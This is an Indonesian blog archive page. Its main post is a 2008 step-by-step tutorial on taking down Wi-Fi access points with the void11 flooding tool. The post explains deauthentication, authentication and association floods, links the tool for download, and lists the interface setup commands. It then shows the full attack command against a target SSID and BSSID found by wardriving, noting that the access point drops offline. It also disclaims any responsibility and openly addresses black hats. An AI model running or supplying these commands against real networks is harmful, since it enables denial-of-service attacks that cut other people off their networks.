Arsip

Posts Tagged ‘Security’

StickyKeys for sticky situations

Pengguna Windows mungkin mengenal StickyKeys, suatu fitur accessibility yang kadang menyebalkan bagi yang tidak membutuhkannya, karena sering tidak sengaja terpanggil ketika kita menekan tombol Shift lima kali berturut-turut. Namun selain menyebalkan, fitur ini juga ternyata menjadi salah satu titik lemah sistem operasi Windows, sekaligus bisa berguna dalam situasi terdesak. Bagaimana bisa?  Baca selanjutnya…

Iklan

Melumpuhkan Access Point dg Void11…

September 5, 2008 1 komentar

Yups, bagi yg seneng dg dunia security, apapun status kamu (Black atau White Hat :p), saya mw sedikit mengenalkan salah satu aplikasi yg dpt melakukan mass flooding utk Access Point (DoS) : Void11.

Void11 memiliki beberapa jenis metode attack, yaitu :

1. Deauthenticate Clients (default mode)
Dengan metode ini, void11 akan melakukan flooding WLAN dengan ‘deauthentication packets’ sehingga
client yang terautentikasi didalam jaringannya akan ngedrop dan terputus dari jaringan WLAN.

2. Authentication Flood
Dengan metode ini, void11 akan melakukan flooding ke Access Point dengan ‘authentication packets (random client MACs)’

3. Association Flood
Dengan metode ini, void11 akan melakukan flooding dengan association packets (random client MACs)

Nah, tadi kan teorinya, sekarang waktunya untuk berkotor-kotor ria!
Apa aja yg perlu disiapkan?
– komputer atw laptop yang udah ada wificard dengan chipset Prism.
– Wardriving utk mendapatkan MAC Address + SSID AP si target
– Donlod void11 dari : http://lirva32.org/images/void11-0.2.0.tar.bz2

Nah ini konfigurasinya :

cd /tools/wifi/void11-0.2.0/console
iwconfig wlan0 mode master
iwpriv wlan0 hostapd 1
./void11_hopper

alternatif void_hopper mode juga bisa menggunakan :
iwconfig wlan0 channel 6 (set card to channel 6)


Penggunaan :
void11_penetration [interface] -D -s [type of attack] -s [station MAC] -S [SSID] -B [BSSID]


Penyerangan :

Misalkan saja kita ingin melakukan penyerangan terhadap sebuah AP, maka saya awali dulu dengan melakukan wardriving…untuk hal ini bisa pakai “kismet”
Dari hasil wardriving didapatkan :

SSID : linksys
mAC : 00:06:BF:64:AB:35


Siapakan penyerangan sbb :

void11_penetration wlan0 -D -t 1 -S linksys -B 00:06:BF:64:AB:35

And, where we go…!!  AP-nya nge-drop. :D. Cukup simpel kan!?

Btw, saya tdk bertanggung jawab ya atas akibat yg ditimbulkan dr tutorial ini.

Selamat mencoba…